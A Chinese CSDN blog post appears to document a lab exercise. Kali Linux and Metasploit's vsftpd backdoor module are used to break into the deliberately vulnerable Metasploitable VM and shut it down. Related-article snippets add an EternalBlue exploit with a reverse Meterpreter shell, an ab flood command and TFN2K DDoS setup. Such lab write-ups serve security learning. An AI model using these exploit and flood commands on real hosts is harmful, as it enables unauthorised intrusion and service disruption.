Linux漏洞攻击实验

最新推荐文章于 2024-08-09 15:51:08 发布
最新推荐文章于 2024-08-09 15:51:08 发布
阅读量5k 收藏 55
点赞数 8
文章标签: Linux Kali 漏洞攻击实验 Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40754097/article/details/90406744
版权

漏洞攻击实验

第一步 配置环境
攻击系统:VMware、Kali-linux
Kali 是一个基于 Debian 的 Linux 发行版,面向专业的渗透测试和安全审计,言下之意就是它自带漏洞攻击的工具,可以用来做入侵测试。
在这里插入图片描述
靶机:Virtual box、Metasploitable-linux
Metasploitable是故意设计用于测试安全工具的并展示常见易受攻击的漏洞的linux系统。言下之意就是它生来就是一个设计好的靶机,存在各种漏洞。

  • 用户名:msfadmin
  • 密码:msfadmin
    在这里插入图片描述
    VMware和Virtual box是两种不同的虚拟机,这些软件在相应的官网上都可以找得到,下载安装就行。

第二步 检查网络连接

物理主机与攻击系统的网络连接方式:NAT模式。
在这里插入图片描述
物理主机与靶机的网络连接的方式:桥接模式(Intel)。
在这里插入图片描述
测试网络连接的时候,可能因为操作系统、软件版本的不同而导致需要不同的连接方式。需要自己多试几次,标准就是:

  • 物理主机ping攻击系统可以ping通。
  • 物理主机ping靶机可以ping通。

接下来我们就来测试一下:
首先需要查看各个系统的IP,进入命令终端,Windows输入ipconfig,Linux输入ifconfig。
物理主机的IP:172.23.72.95
在这里插入图片描述
攻击系统的IP:192.168.231.130
在这里插入图片描述
靶机系统的IP:172.23.32.185
在这里插入图片描述
先用物理主机分别ping一下攻击系统和靶机:
在这里插入图片描述
在这里插入图片描述
可以看到都ping得通,说明网络连接没问题。按照我的理解,物理主机与攻击系统共享一个IP,现在主机能够ping通靶机,那么攻击系统也能ping通靶机。

来测试一下:
在这里插入图片描述
可以看到也成功了,但实际上有一个情况,就是靶机不能ping通物理主机和攻击系统。
在这里插入图片描述
猜想:可能由于物理主机和攻击系统存在防火墙方面的设置所以不能被ping通,也有可能是因为之前虚拟机的网络连接方式。但采用其他方式会直接导致没网,所以只能使用目前的方式。Anyway,这并不影响我们做后续的实验。

谁ping都通的才是靶机,谁ping都不通的才有资格攻击。

第三步 简单检测

为了说明这个靶机系统的到底有多脆弱,我们先来预热一下。
直接在浏览器输入靶机的IP,可以看到:
在这里插入图片描述
在攻击系统端使用telnet命令直接远程登录:
在这里插入图片描述
输入用户名和密码就可以登录进去:
在这里插入图片描述
第四步 正式攻击
使用nmap命令先检测一下靶机上的端口状态:在这里插入图片描述
可以看到很多端口都在开启状态,输入msfconsole,启动metasploit。
在这里插入图片描述
输入 use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞,
输入 set RHOST 172.23.32.185 设置端口,
输入 exploit 开始攻击。
在这里插入图片描述
输入 uname -a 检查所处的系统信息,相当于“我是谁我在哪?”可以看到输出的信息是靶机的,说明已经成功进入靶机。
输入 shutdown -h now 尝试把靶机关掉。
在这里插入图片描述
可以看到通过kali成功进入另外一个操作系统,然后把它关机,这次实验就算成功了。

爱上树的Woody
关注
  • 8
    点赞
  • 55
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
linux渗透实验
06-19
基于linux的ettercap渗透实验
Linux下基本栈溢出攻击
01-30
但是,由于这种攻击方法产生的时间比较长,故而GCC编译器、Linux操作系统提供了一些机制来阻止这种攻击方法对系统产生危害。下面首先了解一下现有的用于保护堆栈的机制以及关闭相应保护机制的方法,为进一步分析基本...
安全漏洞探测实验
要啥啥不行,偷懒第一名
10-27 1157
安全漏洞简介 定义 所谓的漏洞,指的是硬件、软件或策略上的缺陷,被不法者利用,通过网络植入木马、病毒等方式来攻击或控制整个电脑,窃取您电脑中的重要资料和信息,甚至破坏您的系统。在不同种类的软、硬件设备,同种设备的不同版本之间,由不同设备构成的不同系统之间,以及同种系统在不同的设置条件下,都会存在各自不同的安全漏洞问题。漏洞会影响到的范围很大,包括系统本身及其支撑软件,网络客户和服务器软件,网络路由器和安全防火墙等。换而言之,在这些不同的软硬件设备中都可能存在不同的安全漏洞问题。在不同种类的软、硬件设备,
Linux通用系统高危漏洞(CVE-2024-1086)修复案例
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
06-26 1547
2024年3月28日,监 Linux kernel权限提升漏洞(CVE-2024-1086)的PoC/EXP在互联网上公开,该漏洞的CVSS评分为7.8,目前漏洞细节已经公开披露,美国网络安全与基础设施安全局(CISA)6月1日也更新了其已知漏洞(KEV)目录,要求联邦机构在 2024 年 6 月 20 日之前打上补丁,修复追踪编号为 CVE-2024-1086 的 Linux 内核权限提升漏洞。由于该漏洞的公开性,攻击者可能会利用这个漏洞进行恶意攻击,因此建议尽快采取修复措施。
linux——攻防技术介绍|主动攻击|被动攻击
weixin_33841503的博客
07-07 332
一、攻防介绍   1、几种常见的攻击方式   syn攻击:利用TCP的协议漏洞 知识储备:TCP的三次握手协议、建立攻击点   分布式攻击:   2、防御   syn攻击:1、使得第三次握手协议失败 二、主动攻击 直接切断攻击目标的网络连接,然后通过捕获握手协议中的封包,从而寻找攻击点。 三、被动攻击 在本机IP地址和目标IP地址之间寻找攻击点,通过伪造IP,来进行AR...
了解Linux服务器攻击手法
互联网
01-11 294
随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出,并提出不同的解决方案。   对Linux服务器攻击的定义是:攻击是一种旨在妨碍、损害、削弱、破坏Linux服务器安全的未授权行为。攻击的范围可以从服务拒绝直至完全危害和破坏Linux服务器。对Linux服务器攻击有许多...
攻击linux有什么方法,(超级危险)Linux中实现DDOS攻击的方法
weixin_35658042的博客
05-14 169
的配置方法,使用当下最有名的REDHAT Linux进行测试,本次攻击测试我使用的是FEDORA CORE3。开始设置服务器:解压 tar -zxvf tfn2k.tgz1.安装TFN2KTFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的Linux需要不同的设置。先修改src/ip.h注释掉以下部分,否则编译出错。...
kali Linux系统的漏洞利用
06-19
通过以上介绍,我们可以了解到Kali Linux系统中如何使用Metasploitable操作系统进行安全测试实验,以及如何通过Metasploit框架来进行漏洞利用测试。这对于学习网络安全技术、提高防御能力具有重要意义。
攻防实验-arp攻击.pdf
12-10
ARP攻击是一种常见的网络攻击方式,主要通过ARP协议(地址解析协议)的漏洞进行。在ARP攻击中,攻击者通常会伪造ARP报文,将自己的MAC地址伪造成网络中其他设备的MAC地址,并发送给网络上的其他设备,使得这些设备的...
kali Linux操作系统高级测试实验
06-17
### Kali Linux操作系统高级测试实验 #### 一、实验背景及目标 Kali Linux是一款专为信息安全专家设计的Linux发行版,内置了大量用于渗透测试、安全审计等场景的工具。本实验旨在通过一系列高级测试实验,加深对...
缓冲区溢出攻击实验
05-07
### 缓冲区溢出攻击实验详解 #### 实验核心概念与原理 缓冲区溢出是一种常见的软件安全漏洞,尤其在使用C/C++等低级编程语言时更为常见,因为这些语言缺乏内置的安全机制来防止缓冲区边界越界。缓冲区溢出攻击利用...
Linux环境下常见漏洞利用技术.zip
05-20
Linux环境下常见漏洞利用技术.zip
Linux中常见的攻击手段
岁月净好
04-28 562
已知的某个进程在处理某个权限的时候,造成了越权的情况,被人利用系统漏洞或程序漏洞发起攻击,进入未打补丁的系统。黑客首先利用网络扫描工具扫描目标主机的漏洞,然后根据扫描出的漏洞,有针对性地实施攻击,常见的有SQL注入漏洞攻击,网页权限漏洞“挂马”攻击等。常见的有拒绝服务攻击DoS与分布式拒绝服务攻击DDoS,黑客一般利用伪装的源地址或者控制其他多台主机,向目标发出大量的、连续的连接请求,服务器无法在短时间内接受这么多请求,就会造成系统资源耗尽,服务挂起,严重时会造成服务器瘫痪。Linux中常见的攻击手段。
深度揭秘:Linux系统安全攻防实战——从入侵排查到加固及备份的全方位指南
最新发布
VN520的博客
08-09 712
Linux系统中,安全入侵排查是确保系统稳定性和数据安全的重要步骤。本文将详细介绍Linux系统安全入侵排查的方法,包括检查命令及说明,帮助系统管理员及时发现并应对潜在的安全威胁。
【burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
热门推荐
01-17 1万+
【BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
linux攻击
码懵
05-21 1014
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
linux环境安全测评实验报告,linux第一次实验报告
weixin_42519985的博客
05-05 134
iframe载入页面过程显示动画效果http://www.xfeixiang.com/Bug/Detail/A2FD7EFFA8CA72F1加密算法使用(三):用用BASE64采用Base64编码具有不可读性,即所编码的数据不会被人用肉眼所直接看到 package testEncrypt; import java.security.Key; import java.secu ...java web...
web攻击Linux服务器)
suo_y的博客
04-21 3060
CC攻击 1、安装ab命令:yum -y install httpd-tools 2、发起CC攻击:ab -c 200 -n 100000 -H “host:域名” http://IP/1.html (表示200个并发数,共100000条数据) web攻击 敏感信息探测: curl -H “host:域名” http://IP/.git/ 文件读取: curl -H “host:域名” http://IP/soldierofallah.php 威胁情报: curl -H “host:域名” http://
Linux安全之三大攻击(SYN,DDOS,CC)原理及处理的详解
weixin_43215948的博客
08-11 568
Linux安全之SYN攻击原理及处理 TCP自从1974年被发明出来之后,历经30多年发展,目前成为最重要的互联网基础协议,但TCP协议中也存在一些缺陷。 SYN攻击就是利用TCP协议的缺陷,来导致系统服务停止正常的响应。 SYN攻击原理 TCP在传递数据前需要经过三次握手,SYN攻击的原理就是向服务器发送SYN数据包,并伪造源IP地址。 服务器在收到SYN数据包时,会将连接加入backlog队列,并向源IP发送SYN-ACK数据包,并等待ACK数据包,以完成三次握手建立连接。 由于源IP.
Kali Linux攻击实验
05-19
Kali Linux是一款专业的渗透测试和攻击工具集,可以用于测试网络和系统的安全性。以下是一个简单的Kali Linux攻击实验,仅供学习和研究使用,禁止用于非法用途。 1. 安装Kali Linux 首先,您需要安装Kali Linux。您可以从官方网站上下载Kali Linux的ISO镜像文件,并使用它来安装Kali Linux。安装步骤与安装其他操作系统类似。 2. 扫描目标主机 使用Kali Linux中的Nmap工具扫描目标主机,以了解目标主机上哪些端口是打开的。在终端中输入以下命令: ``` nmap -p- <目标主机IP> ``` 这将扫描目标主机上的所有端口,并列出哪些端口是打开的。 3. 发起攻击 接下来,您可以使用Kali Linux中的Metasploit工具发起攻击Metasploit是一个强大的攻击工具,可以利用已知的漏洞对系统进行攻击。在终端中输入以下命令来启动Metasploit: ``` msfconsole ``` 然后,您可以使用Metasploit中的exploit或payload模块对目标主机进行攻击。例如,以下命令将使用Metasploit的EternalBlue漏洞模块对目标主机进行攻击: ``` use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标主机IP> set payload windows/x64/meterpreter/reverse_tcp run ``` 这将利用EternalBlue漏洞对目标主机进行攻击,并在目标主机上安装一个反向TCP Meterpreter shell。 4. 接管目标主机 一旦攻击成功,您可以使用Metasploit中的反向TCP Meterpreter shell接管目标主机。在Metasploit终端中输入以下命令来启动反向TCP Meterpreter shell: ``` sessions -i 1 ``` 这将启动与目标主机的交互式会话。您可以使用Meterpreter shell执行各种命令,例如查看目标主机上的文件、下载文件、上传文件、截取屏幕等等。 请注意,这只是一个简单的Kali Linux攻击实验,实际的攻击工作需要深入的技术知识和严格的道德准则。在进行任何攻击操作之前,请务必了解相关法律法规,并遵守道德准则。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值